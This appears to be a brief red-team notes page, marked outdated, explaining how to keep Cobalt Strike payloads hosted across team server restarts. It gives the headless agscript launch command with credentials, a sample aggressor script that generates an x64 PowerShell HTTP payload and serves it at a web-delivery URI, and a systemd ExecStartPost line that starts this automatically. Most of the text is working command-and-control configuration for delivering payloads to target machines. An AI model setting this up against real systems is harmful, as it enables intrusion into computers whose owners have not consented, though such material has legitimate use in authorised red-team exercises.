Outdated
This note is no longer useful due to a Cobalt Strike version update.
Normally, hosted files on Cobalt Strike do not persist when team server restarts, which may present a problem for persistence methods that depend on scripted web delivery, hosted files, etc. To alleviate this annoyance, we can set up a headless Cobalt Strike client to execute an aggressor script on launch, which will host payloads and files as defined.
To start a headless client, use the format agscript [host] [port] [user] [password] [/path/to/aggressor/script.cna].
Sample aggressor script:
# host_payloads.cna
# handles event "on ready"
on ready {
# protocol, payload type, payload architecture
$payload = artifact_payload("http", "powershell", "x64");
# host, port, URI, payload object, MIME type, description, use HTTPS or not
site_host("10.10.5.50", 80, "/a", $payload, "text/plain", "Auto Web Delivery (PowerShell)", false);
}We can start this aggressor script with the following:
./agscript 127.0.0.1 50050 headless Passw0rd! host_payloads.cnaTo make it start with the teamserver service, add this to teamserver.service file (see Cobalt Strike team server as systemd service):
ExecStartPost=/bin/sh -c '/usr/bin/sleep 30; /home/attacker/cobaltstrike/agscript 127.0.0.1 50050 headless Passw0rd! host_payloads.cna &'